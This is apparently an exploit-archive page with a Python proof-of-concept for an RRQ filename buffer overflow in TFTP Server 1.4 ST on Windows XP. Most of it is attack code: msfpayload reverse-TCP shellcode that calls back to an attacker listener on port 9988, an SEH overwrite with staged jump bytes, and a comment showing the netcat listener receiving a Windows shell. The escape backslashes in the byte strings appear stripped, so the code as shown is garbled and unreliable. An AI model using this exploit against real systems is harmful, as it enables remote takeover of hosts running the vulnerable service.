[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit
# Published : 2012-01-10
# Author :
# Previous Title : Sysax Multi Server 5.50 Create Folder BOF
# Next Title : McAfee SaaS MyCioScan ShowReport Remote Command Execution
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #
# OS: Windows XP PRO SP3 #
# Author: b33f #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise... #
# #
# This tftp service have been pwned extensively: #
# (1) Muts ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/5314/ #
# (2) Molotov ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/10542/ #
# (3) tixxDZ ==> ERROR Overflow #
# http://www.exploit-db.com/exploits/5563/ #
# #
# Vulnerable software: #
# http://www.exploit-db.com/application/5314/ #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read #
# Request (RRQ) packet can also trigger a buffer overflow... #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear #
# as expected.... #
# #
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# C:Program FilesTFTPServer> #
#---------------------------------------------------------------------------#
import socket
import sys
host = '192.168.111.128'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00'
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
shell = (
"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97"
"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"
"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"
"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff"
"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"
"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0"
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c"
"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"
"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"
"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"
"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f"
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"
"xafx96x42xdfxddx87x26xdfx72xa7x62")
#---------------------------------------------------------------------------#
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR #
# => 3-byte overwrite using the mandatory protocol null-byte. #
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump. #
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer. #
# (4) Stage4: reverse shell port 9988 - size 341 #
#---------------------------------------------------------------------------#
stage4 = "x90"*50 + shell
stage3 = "xE9x2ExFAxFFxFF"
stage2 = "xEBxF9x90x90"
stage1 = "x05x96x40"
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
mode = "netascii"
youlose = "x00x01" + filename + "x00" + mode + "x00"
s.sendto(youlose, (host, port))